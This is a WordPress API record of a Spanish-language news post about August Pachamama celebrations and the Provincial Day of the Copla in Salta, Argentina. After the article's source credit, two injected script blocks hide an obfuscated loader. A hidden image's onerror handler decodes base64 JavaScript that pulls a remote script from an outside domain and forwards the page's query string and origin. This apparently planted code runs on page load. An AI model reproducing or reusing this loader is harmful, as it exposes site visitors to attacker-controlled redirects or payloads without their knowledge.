{"id":2909,"date":"2023-07-27T10:44:46","date_gmt":"2023-07-27T13:44:46","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2909"},"modified":"2025-08-14T00:11:46","modified_gmt":"2025-08-14T03:11:46","slug":"agosto-con-actividades-turisticas-y-culturales-para-celebrar-el-mes-de-la-pachamama","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2909","title":{"rendered":"Agosto con actividades tur\u00edsticas y culturales para celebrar el mes de la Pachamama"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#9d042a\"><em>Entre el 1 y el 31 de agosto los municipios organizaron actividades para celebrar el mes de la Pachamama. Tambi\u00e9n se present\u00f3 el D\u00eda Provincial de la Copla.<\/em><\/h4>\n\n\n\n<p>El Ministerio de Turismo y Deportes y la Secretar\u00eda de Cultura presentaron esta ma\u00f1ana las Celebraciones de la Pachamama que el 1 de agosto comenzar\u00e1 con diversas actividades en todas las regiones tur\u00edsticas de la provincia. Tambi\u00e9n el D\u00eda Provincial de la Copla, a conmemorarse el 19 de agosto.<\/p>\n\n\n\n<p>El&nbsp;<strong>secretario de Cultura Diego Ashur<\/strong>&nbsp;destac\u00f3 el trabajo articulado con el Ministerio de Turismo y con el sector privado para conformar un importante calendario de actividades; asimismo, manifest\u00f3 la importancia de la celebraci\u00f3n a la Madre Tierra \u201cque nos viene de tiempos precolombinos de ofrendar, pedir, esperar estar un poquito mejor con nuestra familia, con nuestros ganados, con nuestros cultivos\u201d; asimismo, en relaci\u00f3n con la copla indic\u00f3 que la celebraci\u00f3n tiene caracter\u00edsticas propias en cada regi\u00f3n salte\u00f1a y que habr\u00e1 numerosas actividades en diferentes lugares.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3975-flyer.jpeg\" alt=\"\" class=\"wp-image-2916\" width=\"238\" height=\"134\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3975-flyer.jpeg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3975-flyer-300x169.jpeg 300w\" sizes=\"(max-width: 238px) 100vw, 238px\" \/><\/figure><\/div>\n\n\n<p>Por su parte, el subsecretario de Desarrollo y Competitividad del Ministerio de Turismo y Deportes Alejandro Cha Usandivaras, agradeci\u00f3 la presencia del presidente de la C\u00e1mara de Turismo Juan Lucero y refiri\u00f3 al importante avance de Salta en obras que favorecen el turismo y asegur\u00f3 \u201csumado a las todas las tradiciones culturales, gastron\u00f3micas, creencias populares y todo lo que tiene que ver con el sentir del pueblo salte\u00f1o, configuran un elemento importante en ese gran atractivo que tur\u00edsticamente tiene Salta\u201d.<\/p>\n\n\n\n<p>La presentaci\u00f3n cerr\u00f3 con un Convite a la Pachamama realizado por el Centro de Residentes Vallistos y Pune\u00f1os, Ra\u00edces de los Pueblos y Collas Unidos de San Antonio de los Cobres.&nbsp; Las actividades pueden consultarse en&nbsp;https:\/\/www.saltacalendario.gob.ar\/<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2910\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3970-foto-de-archivo.jpg\" alt=\"\" class=\"wp-image-2910\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3970-foto-de-archivo.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3970-foto-de-archivo-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3970-foto-de-archivo-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3970-foto-de-archivo-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3970-foto-de-archivo-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2912\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3971-foto-de-archivo.jpg\" alt=\"\" class=\"wp-image-2912\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3971-foto-de-archivo.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3971-foto-de-archivo-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3971-foto-de-archivo-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3971-foto-de-archivo-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3971-foto-de-archivo-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2913\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3972-foto-de-archivo.jpg\" alt=\"\" class=\"wp-image-2913\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3972-foto-de-archivo.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3972-foto-de-archivo-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3972-foto-de-archivo-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3972-foto-de-archivo-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3972-foto-de-archivo-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2911\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3973-foto-ilustrativa.jpg\" alt=\"\" class=\"wp-image-2911\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3973-foto-ilustrativa.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3973-foto-ilustrativa-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3973-foto-ilustrativa-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3973-foto-ilustrativa-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3973-foto-ilustrativa-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2914\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3969-foto-de-archivo.jpg\" alt=\"\" class=\"wp-image-2914\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3969-foto-de-archivo.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3969-foto-de-archivo-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3969-foto-de-archivo-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3969-foto-de-archivo-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3969-foto-de-archivo-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"560\" height=\"373\" data-id=\"2915\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90878-agosto-con-actividades-turisticas-y-culturales-para-celebrar-el-mes-de-la-pachamama.jpg\" alt=\"\" class=\"wp-image-2915\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90878-agosto-con-actividades-turisticas-y-culturales-para-celebrar-el-mes-de-la-pachamama.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90878-agosto-con-actividades-turisticas-y-culturales-para-celebrar-el-mes-de-la-pachamama-300x200.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/agosto-con-actividades-turisticas-y-culturales-para-celebrar-el-mes-de-la-pachamama-90878\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Entre el 1 y el 31 de agosto los municipios organizaron actividades para celebrar el mes de la Pachamama. Tambi\u00e9n se present\u00f3 el D\u00eda Provincial de la Copla. El Ministerio de Turismo y Deportes y la Secretar\u00eda de Cultura presentaron esta ma\u00f1ana las Celebraciones de la Pachamama que el 1 de agosto comenzar\u00e1 con diversas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2915,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-2909","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2909"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2909"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2909\/revisions"}],"predecessor-version":[{"id":7011,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2909\/revisions\/7011"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2915"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2909"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2909"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2909"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}